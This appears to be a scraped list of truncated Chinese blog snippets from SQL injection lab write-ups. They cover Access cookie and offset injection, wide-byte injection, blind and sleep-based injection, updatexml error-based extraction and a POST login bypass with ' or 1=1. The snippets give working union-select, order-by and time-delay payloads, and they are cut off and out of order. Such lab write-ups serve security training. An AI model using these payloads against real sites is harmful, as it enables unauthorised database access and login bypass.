LOAD_FILE()   读取文件的函数读取文件并返回文件内容为字符串。要使用此函数，文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。 该文件所有字节可读，但文件内容必须小于max_allowed_packet（限制server接受的数据包大小函数，默认1MB）。 如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回 NULL。http:/

5.1.2、Access注入 — 偏移注入and 1=1，发现依旧有waf过滤；跟上题一样用火狐插件；ID=105+order+by+27猜字段数，27报错，26正常，得字段数26；ID=105+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin,猜测有表可能为ad

5.1.1、Access注入 — Cookie注入and 1=1,有过滤，用cookie绕过；运用火狐插件hackbar，导入url，cookies打勾，输入id=171页面正常；id=171+order+by+11,页面报错，id=171+order+by+10，页面正常，字段数为10；id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin,猜表名

1.宽字节注入条件：    php使用addslashes函数，或开启GPC(魔术引号)；addslashes函数是对单引号' 双引号" 反斜杠\ 以及null进行转义，在其前面添加一个\；    数据库设置编码为GBK，php 编码为utf-8；2.宽字节注入原理：    汉字在

length() 函数 返回字符串的长度substr() 截取字符串 （语法:SUBSTR(str,pos,len);） ascii() 返回字符的ascii码sleep() 将程序挂起一段时间n为n秒if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句6.4.1-SQL注入-延时注入Rank 1' and sleep(10)--+

6.2.1-SQL注入-盲注Rank 1 熟悉的and 1=1--+， and 1=2--+，发现不报错，一看代码要闭合'.闭合之后and 1=2 --+报错，是注入点；' order by 3正常，' order by 4报错，说明有3个字段；' and 1=2 union select 1,2,3 --+,并没回显，就要运用盲注；下面都是盲注需要用到的

updatexml() 更新xml文档的函数语法：updatexml(目标xml文档，xml路径，更新的内容)updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)实际上这里是去更新了XML文档，但是我们在XML文档路径的位置里面写入了子查询，我们输入特殊字符，然后就因为不符合输入规则然后报错了但是报错的时候他其实已经执行了那个子查询代码！6.5.

6.6.1-SQL注入-Post注入Rank万能密码1' or 1=1 -- ，成功登录1' or 1=1 order by 2-- 页面正常，1' or 1=1 order by 3--报错，猜字段2个1' or 1=2 union select 1,2 -- ，1，2都是输出点1' or 1=2 union select 1,database(

6.1.1-SQL注入-显错注入Rank 1进入靶场后输入？id=1，之后and 1=1 正常 ，and 1=2也正常，看了看代码需要闭合'和注释到后面的符号和代码；闭合和注释之后发现 and 1=1 还是正常，但and 1=2报错，证明这可能是个注入点；之后用order by 猜表里有多少字段，order by 3正常，但order by 4 报错，则表里有3个字段；and 1=2 un

由代码可以看到是get传参，变量为id。//是开始与结束符，所以要匹配//里面的值。*匹配前面的子表达式零次或多次。要匹配 * 字符，请使用 \*。.匹配除换行符 \n 之外的任何单字符。要匹配 . ，请使用 \. 。\将下一个字符标记为或特殊字符、或原义字符、或向后引用、或八进制转义符。例如， 'n' 匹配字符 'n'。'\n' 匹配换行符。序列